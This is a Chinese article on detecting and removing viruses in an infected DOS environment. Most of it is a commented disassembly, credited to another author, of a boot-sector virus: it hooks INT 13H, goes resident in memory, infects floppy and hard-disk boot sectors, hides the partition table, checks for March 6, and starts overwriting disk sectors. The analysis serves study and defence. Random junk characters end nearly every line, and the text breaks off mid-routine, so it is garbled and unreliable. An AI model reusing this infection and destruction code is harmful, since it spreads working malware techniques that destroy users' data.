近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 (<|1/^~=
?? PJh97%7
?? 一 、 带毒环境下检测清除病毒的意义 `KP}pi\
?? sJ_3tjs)
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 ,nw5 M.D_
?? ]/mRMm9"3h
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 Yp$@i20
?? w#sP5qKv8
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 S~ y.>X3"P
?? u/`x@u
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 Ap}`Q(.
?? _`9WNJiL
?? 二 、带毒环境下检测清除病毒的原理 uVw|jj
?? =mxj2>,&
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 "W"r0"4
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 *MN("<A_
tqU8>d0^
d^|r#"o[
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " L%.=SbmS
病毒体: XfwH1n/o#
JMP 01AF ;JMP到01AF A+hT2Ew@t}
DB 00 ;病毒标计 &([Gc+"5E.
DW 00F5 ;此为搬到高位址后,远程跳转指令 wY7+E/
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX u z:@
DB 02 )Mw 3ZE92
DW 0003 ;此为软盘识别标记,硬盘为0007 7$:Jea
DW EC59 ; MV?sr[V-oP
DW F000 ;INT 13H的原入口 +AOpB L'
. <)gTi759h)
.
&y7~
. dQ Ao~]B
. M[&p[P@
. 2AjP2
XOR AX,AX ;清除AX x=44ITe1n[
MOV DS,AX; ;让DS=0000 PE+{<[n
CLI ;清I标志积存器 U9//m=_
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 A~wyn5:_
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 Mwd.S
MOV SP,AX ;开机时为0000:7CB6 71HrpTl1fw
STI ;设I标志积存器 WQY\R!+
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A '/F~vSQsR
PUSH AX ;用RETF,把程序转到引导或分区表位置 o@|kq1m8
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 [i]%PVGW
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 xb^M33-y
MOV AX,[004E] ;取INT 13H的段地址 E._ [P/PB
MOV [7C0C],AX ;存到010C fH_Xm :%
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 I8:G:s:
;读写以便传播发作 X^.~f+d~
V} t8H
MOV AX,[0413] ;取得内存K数,放在AX <kWNx.eci
DEC AX ; R!_1 *H$
DEC AX ;减2k内存 1++ Fs
MOV [0413],AX ;存回,通常是638K d|$-Sz
MOV CL,06 ; O}[){*GG=
SHL AX,CL ; _jk+$`[9PL
MOV ES,AX ;算出减2K后病毒本体的位址 ~*G}+Ur$2
MOV [7C05],AX ;AX存入0105 z&A#d
O u{|o0
;病毒常用手法将系统高段内存减少以便驻留 j(Tk6S
;这样可以免于被其他程序覆盖 ?h ym~,
$b"Ex>
MOV AX,000E ;病毒拦INT 13H 8X=2# &)
;ISR起始的偏移量 h,2?+}Fn
MOV [004C],AX ; 1.z !u%2
MOV [004E],ES ;设原为病毒的INT 13H 4' <y
MOV CX,01BE ;病毒长度为1BE C3 (PI,,
MOV SI,7C00 ;从JMP 01AF开始 BlfW~l'mx
XOR DI,DI ;DI=0 sQa9M
CLD ;清方向标志 )Z@hk]@?_[
REPZ; Th 5}?j7
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 Oat
#%
CS: ;分区表能载入0000:7C00正常运作 D?9EO=
JMP FAR [7C03] ;跳到为搬过后的位址 @|Hx>|p
XOR AX,AX ;清AX M
cbiO)@I
MOV ES,AX ;ES=0000 ;+VHi%5Z
INT 13 ;复位磁盘 VN<baK%]
PUSH CS ; &}lRij&`
POP DS ;让DS=CS N'0fB`:kz
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则
8B7,qxZ
MOV BX,7C00 ;读到0000:7C00 ny+_&l^R~(
MOV CX,[0008] ;硬盘第0道,第7扇区 *|/kKvN
CMP CX,+07 ;比较是否从硬盘启动 HAMps[D[
JNZ 0213 ;不是跳0213 OMN|ea.O
MOV DX,0080 ;第一硬盘C:第零面 ~bX ) %jC
INT 13 ;用INT 13号中断,读 ;?!pcv Ui
JMP 023E ;跳023E比较日期,发作或正常开机 1s#GY<<
MOV CX,[0008] ;软盘0道,第3扇区 C<iOa)_@Q
MOV DX,0100 ;A:的第0面 { :_qa |
INT 13 ;INT 13读盘 C~VyM1inD
JB 023E ;失败跳023E 6T A2
PUSH CS ZY> u4v.
POPES ;让ES=CS ;F>I+l_X
MOV AX,0201 ; Y]HtO^T2
MOV BX,0200 ; )N]%cO(^
MOV CX,0001 ; azpXE
MOV DX,0080 ; Hbz,3{o5
INT 13 ;读入C:的分区表到0200,以便下面比较 *uZ'MS
JB 023E ;失败跳023E lyrwm{&
XOR SI,SI ;清SI o|c"W}W
CLD ;清方向标志以便比较 m}fY5r<<;/
LODSW ;载入一个WORD到AX t)*A#
CMP AX,[BX] ;比较有无病毒存在..E9AC {]:B80I;2
JNZ 0287 ;没有则跳0287传染 ^]?Yd )v
LODSW ;载入一个WORD到AX kZvh<NFh_
CMP AX,[BX+02] ;再次确认..0000 :Nw7!fd
JNZ 0287 ;没有跳0287 \b|Q `)TK
XOR CX,CX ;清CX |0aGX]Y
MOV AH,04 ; .1?7)k
v
INT 1A ;取得日期 <<9Y=%C+
CMP DX,0306 ;是否为三月六日 3 p9LVa
JZ 024B ;是跳024B传染 I}7=\S/@
RETF ;把程序交还给引导启动完成 rZ7)sE5L
?anKSGfj
步骤4:病毒INT 13代码分析 +jz%:D
方法:U t M{U6k
PUSH DS ;首先把要用到积存器 H.:
[#
a
PUSH AX ;入栈保存 m3iB`
OR DL,DL ;比较是否为软盘 {Ng HH]]O
JNZ 002F ;如不是则退出传染 X+k`UM~
XOR AX,AX ;AX=0 s2\6\8Ipn
MOV DS,AX ;数据代段=0 H3"D$Nv
TEST BYTE PTR [043F],01 ;比较是否为A盘 v_ W03\
JNZ 002F ;不是则退出 Y@M
l}43
POP AX ;将以上保存积存器 rlVo}kc7:
POP DS ;弹栈恢复 8\ WOss)al
PUSHF ;压栈标志积存器 ^Dhu8C(
CS: ;以便执行原INT 13 G,b1 u"
CALL FAR [000A] ;执行原INT 13 vE+OL8 V
PUSHF ;再次压栈 $;%dQ!7*
CALL 0036 ;以便跳转到传染程序 834dsl+U
POPF ;跳转到执行传染 ,4z?9@wQ
RETF 0002 ;结束中断调用返回 FUU/=)^P$
POP AX ;恢复 2T#>66^@q
POP DS ;堆栈 /w*;|4~Bf
CS: ;跳转到原正常INT 13 wa4(tM2
JMP FAR [000A] ;地址执行 ]gGCy '*)
$5m_)]w4a
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 jF%[.n[BU
n`)wD~mk
步骤5:传染过程分析 Zr@G
方法:U PyfOBse}r
对软盘传染过程: #2*2xt
PUSH AX ;工 t#[u
X?
PUSH BX ;作 -, #LTW<.
PUSH CX ;寄 z;EnAy {9
PUSH DX ;存 l<mEGKB#
PUSH DS ;器 k@= LR
PUSH ES ;入 `mTc
PUSH SI ;栈 r=ds'n"
PUSH DI ;保存 7Y(ySW
PUSH CS ;以压/弹栈方式 L]HYk}oD.
POP DS ;使数据段DS和 ewcgg
PUSH CS ;附加段ES均指向 kaj6C_k|
POP ES ;代码段CS ';bovh@*
MOV SI,0004 ;试4次 a0ze7F<(
MOV AX,0201 ;设置各 ]tVXao
MOV BX,0200 ;积存器 RDu'N
MOV CX,0001 ;为读软盘 IW'2+EGc
XOR DX,DX ;引导扇区做准备 f@a@R$y
PUSHF ;压栈标志积存器 iy_\1jB0
CALL FAR [000A] ;正常的INT 13调用 \3@A C7
JNB 0063 ;成功则转判断 |+MV%QG;
XOR AX,AX ;不成功复位 5=.EngG
PUSHF ;磁盘继续读 q#~]Hp=W5
CALL FAR [000A] ;如果4次 35[8XD
DEC SI ;均匀不成功 'qg q8
JNZ 0045 ;则退出跳转 mjqVP.
JMP 00A6 ;退出传染 y3O Nn~k
XOR SI,SI ;SI=0以便用 #dgWXO
CLD ;LODSW读入软盘 /8` S}g+
LODSW ;第1或第2字进行比较 :i6k6=
CMP AX,[BX] ;比较如果不包含病毒标志 ;|LS$O1c
JNZ 0071 ;则跳转写传染 $yx34=
LODSW ;如果已有标志 xBC:%kG~#
CMP AX,[BX+02] ;则退出 Ilc FW
JZ 00A6 ;传染子程序 5Y&s+|
MOV AX,0301 ;为写盘准备 txwTJScg
MOV DH,01 ;如果是360K ZSTpA,+6
MOV CL,03 ;则写到1面0道3扇区 lAwOp
CMP BYTE PTR [BX+15],FD ;比较软盘 e[@q{.
JZ 0080 ;如果大于360K *?+maK{5+
MOV CL,0E ;写到1面0道14扇区 Y(]&j`%
MOV [0008],CX ;写病毒标志到软盘 ,1YnWy*
PUSHF ;调用原INT 13 #)BdN
CALL FAR [000A] ;进行传染 k+S 6)BQ7U
JB 00A6 &,Xs=Lvmq
MOV SI,03BE ;以下是将正常 vx\h
Njb
MOV DI,01BE ;引导扇区从 h?:lO3)TL=
MOV CX,0021 ;1BE起的21字节内容 zAxwM-`
CLD ;搬移到病毒程序尾部 q#RVi8('
REPZ ;开始复制 ZK[S'(6q
MOVSW }hFjl4`xa
MOV AX,0301 ;写盘功能调用,写一个扇区 E5M*Gs
XOR BX,BX ;将病毒程序 ZC1U
MOV CX,0001 ;写入软盘引导扇区内 iM Xl}3
XOR DX,DX ;设置为软盘 nV0"q|0K;
PUSHF B94mh
CALL FAR [000A] ;执行正常INT 13调用写盘 ;Db89Nc$
POP DI ;将 uj-q@IKe
POP SI ;工 -hP@L ++D
POP ES ;作 khb
Gyg%
POP DS ;寄 {O,Cc$_
POP DX ;存 ]AGJPuX
POP CX ;器 d*lnXzQor
POP BX ;退 <oSk!6*
POP AX ;栈 .Wq`qF(;
RET ;返回调用处 qu[x=LZ_
对硬盘传染过程: ,diV;d
MOV CX,0007 ;第7扇区 U jC$Mi`O
MOV [0008],CX ;此处为硬盘引导标记 BV&}(9z
MOV AX,301 ;写功能调用 r^?%N3
MOV DX,0080 ;设置为硬盘 >Tld:
INT 13 ;将正常引导扇区写到0面0道7扇区内 0=8.8LnN(
JB 13E ;失败则转 V\kf6E
MOV SI,03BE ;原分区表地址 qb
^4G
MOV DI,01BE ;目标地址 v5t`?+e
MOV CX,0021 ;整个分区表 y )v'0q
REPNZ G2k r~FG
MOVSW ;开始复制 4\?I4|{pC
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 *Df|D/,WE
;这样在分析着查看硬盘分区信息时仍能看到该部分 Y1
i!
;内容,以次来麻痹分析者 nFlj`k<]Y
MOV AX,0301 ;准备写病毒提进硬盘 'PlKCn`(w
XOR BX,BX ;病毒体位置 nYuZg6K
INC CL ;第一扇区 ~`{HWmah
INT 13 ;开始写盘传染 mLO{~ruu
JMP 013E ;转到13E处判断是否为3月6日,是则发作 U3^T.i"R
eN%Ks
步骤6:破坏过程分析 A;h0BQm/j
方法:U I ,AI$A
主要分析对硬盘数据破坏: 3yXF|
yV
. t9PS5O ;
. ?#\?&uFJ}
. hSD)|
. {
Lt\4h
. fj 19U9R
MOV DL,80 L`+\M+
MOV BYTE PTR[0007],04 E<a~
`e
;准备写硬盘 R$*{@U
MOV AL,11 ;写17个扇区 WZCX&ui